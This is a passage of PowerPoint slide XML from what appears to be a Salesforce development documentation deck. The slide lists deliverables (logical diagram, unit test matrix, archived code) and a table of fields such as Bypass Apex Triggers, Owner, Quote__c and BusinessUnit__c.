          <p:cNvPr id="11271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63" y="914400"/>
            <a:ext cx="1141412" cy="85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1272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63" y="2192338"/>
            <a:ext cx="1141412" cy="85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1273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63" y="3429000"/>
            <a:ext cx="1141412" cy="85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953000" y="762000"/>
            <a:ext cx="3124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63500" rIns="139489" bIns="635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358775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538163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•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000">
              <a:solidFill>
                <a:srgbClr val="6B6B6B"/>
              </a:solidFill>
              <a:sym typeface="Arial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•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="6B6B6B"/>
                </a:solidFill>
                <a:sym typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>A logical diagram</a:t>
            </a:r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–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:solidFill>
                  <a:srgbClr val="6B6B6B"/>
                </a:solidFill>
                <a:sym typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Describing all the code logic, tests and actions</a:t>
            </a:r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</a:pPr>
            <a:endParaRPr lang="en-US" sz="900"/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</a:pPr>
            <a:endParaRPr lang="en-US" sz="900"/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</a:pPr>
            <a:endParaRPr lang="en-US" sz="900"/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</a:pPr>
            <a:endParaRPr lang="en-US" sz="900"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2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•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="6B6B6B"/>
                </a:solidFill>
                <a:sym typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Unit tests matrix</a:t>
            </a:r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–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:solidFill>
                  <a:srgbClr val="6B6B6B"/>
                </a:solidFill>
                <a:sym typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Each condition is a case that has to be tested.</a:t>
            </a:r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–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:solidFill>
                  <a:srgbClr val="6B6B6B"/>
                </a:solidFill>
                <a:sym typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The table provides the expected result.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="900"/>
          </a:p>
          <a:p>
            <a:pPr lvl="3" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="900"/>
          </a:p>
          <a:p>
            <a:pPr lvl="3" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="900"/>
          </a:p>
          <a:p>
            <a:pPr lvl="3" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="900"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2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•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="6B6B6B"/>
                </a:solidFill>
                <a:sym typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The Code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="6B6B6B"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:solidFill>
                  <a:srgbClr val="6B6B6B"/>
                </a:solidFill>
                <a:sym typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Archived after development, for code review purpose</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11275" name="Group 176"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3124200" y="4191000"/>
            <a:ext cx="1736725" cy="644525"/>
            <a:chOff x="1872" y="2592"/>
            <a:chExt cx="1094" cy="406"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1127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72" y="2592"/>
              <a:ext cx="109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1278" name="Group 19"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="1872" y="2592"/>
              <a:ext cx="1090" cy="58"/>
              <a:chOff x="1872" y="2352"/>
              <a:chExt cx="1090" cy="58"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="11438" name="Rectangle 16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1090" cy="58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1439" name="Picture 1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3" y="2352"/>
                <a:ext cx="108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40" name="Rectangle 18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1090" cy="58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1279" name="Rectangle 20"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2215" y="2610"/>
              <a:ext cx="46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000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Fields used for this development</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11280" name="Rectangle 21"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2369" y="2944"/>
              <a:ext cx="34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1" name="Rectangle 22"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2386" y="2958"/>
              <a:ext cx="17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BusinessUnit__c</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11282" name="Rectangle 23"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2369" y="2893"/>
              <a:ext cx="34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3" name="Rectangle 24"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2386" y="2908"/>
              <a:ext cx="16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Opportunity__c</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11284" name="Rectangle 25"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2369" y="2808"/>
              <a:ext cx="34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Rectangle 26"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2386" y="2823"/>
              <a:ext cx="90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OwnerId</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11286" name="Rectangle 27"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2369" y="2758"/>
              <a:ext cx="34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Rectangle 28"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2386" y="2773"/>
              <a:ext cx="6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Profile</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11288" name="Rectangle 29"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2369" y="2707"/>
              <a:ext cx="34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Rectangle 30"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2386" y="2722"/>
              <a:ext cx="28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Bypass_Appex_triggers__c</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11290" name="Rectangle 31"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2369" y="2650"/>
              <a:ext cx="341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Rectangle 32"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2386" y="2668"/>
              <a:ext cx="16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Field name</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11292" name="Rectangle 33"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2710" y="2758"/>
              <a:ext cx="252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Rectangle 34"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2727" y="2773"/>
              <a:ext cx="11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Reference </a:t>
              </a:r>
              <a:endParaRPr lang="en-GB"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11294" name="Rectangle 35"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2842" y="2773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-</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11295" name="Rectangle 36"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2850" y="2773"/>
              <a:ext cx="84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&gt; Name</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11296" name="Rectangle 37"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2088" y="2758"/>
              <a:ext cx="28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Rectangle 38"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2106" y="2773"/>
              <a:ext cx="6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Profile</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11298" name="Rectangle 39"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1873" y="2758"/>
              <a:ext cx="215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Rectangle 40"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2710" y="2944"/>
              <a:ext cx="252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Rectangle 41"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2727" y="2958"/>
              <a:ext cx="74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Picklist</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11301" name="Rectangle 42"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2088" y="2944"/>
              <a:ext cx="28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2" name="Rectangle 43"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2106" y="2958"/>
              <a:ext cx="3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BU</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11303" name="Rectangle 44"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1873" y="2944"/>
              <a:ext cx="215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4" name="Rectangle 45"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1873" y="2650"/>
              <a:ext cx="215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5" name="Rectangle 46"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1890" y="2668"/>
              <a:ext cx="10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Objects</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11306" name="Rectangle 47"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2088" y="2650"/>
              <a:ext cx="281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Rectangle 48"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2106" y="2668"/>
              <a:ext cx="14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Field label</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11308" name="Rectangle 49"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2710" y="2650"/>
              <a:ext cx="252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Rectangle 50"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2727" y="2668"/>
              <a:ext cx="72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Type</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11310" name="Rectangle 51"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1873" y="2707"/>
              <a:ext cx="215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Rectangle 52"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1890" y="2722"/>
              <a:ext cx="50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User</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11312" name="Rectangle 53"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2088" y="2707"/>
              <a:ext cx="28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Rectangle 54"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2106" y="2722"/>
              <a:ext cx="23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Bypass Apex Triggers</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11314" name="Rectangle 55"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2710" y="2707"/>
              <a:ext cx="252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5" name="Rectangle 56"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2727" y="2722"/>
              <a:ext cx="13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Picklist multi</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11316" name="Rectangle 57"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2857" y="2722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-</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11317" name="Rectangle 58"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2864" y="2722"/>
              <a:ext cx="6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select</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11318" name="Rectangle 59"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1873" y="2808"/>
              <a:ext cx="215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9" name="Rectangle 60"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1890" y="2823"/>
              <a:ext cx="12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</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11320" name="Rectangle 61"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2088" y="2808"/>
              <a:ext cx="28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1" name="Rectangle 62"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2106" y="2823"/>
              <a:ext cx="25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Leading PL Opportunity </a:t>
              </a:r>
              <a:endParaRPr lang="en-GB"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11322" name="Rectangle 63"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2106" y="2857"/>
              <a:ext cx="9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Manager</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11323" name="Rectangle 64"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2710" y="2808"/>
              <a:ext cx="252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4" name="Rectangle 66"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1873" y="2893"/>
              <a:ext cx="215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5" name="Rectangle 67"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1890" y="2908"/>
              <a:ext cx="10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Quote__c</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11326" name="Rectangle 68"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2088" y="2893"/>
              <a:ext cx="28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7" name="Rectangle 69"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2106" y="2908"/>
              <a:ext cx="12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</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11328" name="Rectangle 70"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2710" y="2893"/>
              <a:ext cx="252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9" name="Rectangle 71"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2727" y="2908"/>
              <a:ext cx="20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Lookup(Opportunity</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11330" name="Rectangle 72"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2933" y="2908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)</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11331" name="Line 73"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1873" y="2707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2" name="Line 74"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1873" y="2758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3" name="Line 75"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1873" y="2893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4" name="Line 76"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1873" y="2944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5" name="Line 77"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1873" y="2592"/>
              <a:ext cx="0" cy="40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6" name="Line 78"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2962" y="2592"/>
              <a:ext cx="0" cy="40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7" name="Line 79"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1873" y="2592"/>
              <a:ext cx="108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8" name="Line 80"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1873" y="2994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39" name="Line 81"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1873" y="2808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0" name="Line 82"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2369" y="2707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1" name="Line 83"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2710" y="2707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2" name="Line 84"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2369" y="2758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3" name="Line 85"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2710" y="2758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4" name="Line 86"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2369" y="2808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5" name="Line 87"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2710" y="2808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6" name="Line 88"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2369" y="2893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7" name="Line 89"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2710" y="2893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8" name="Line 90"/>
            <p:cNvSpPr>
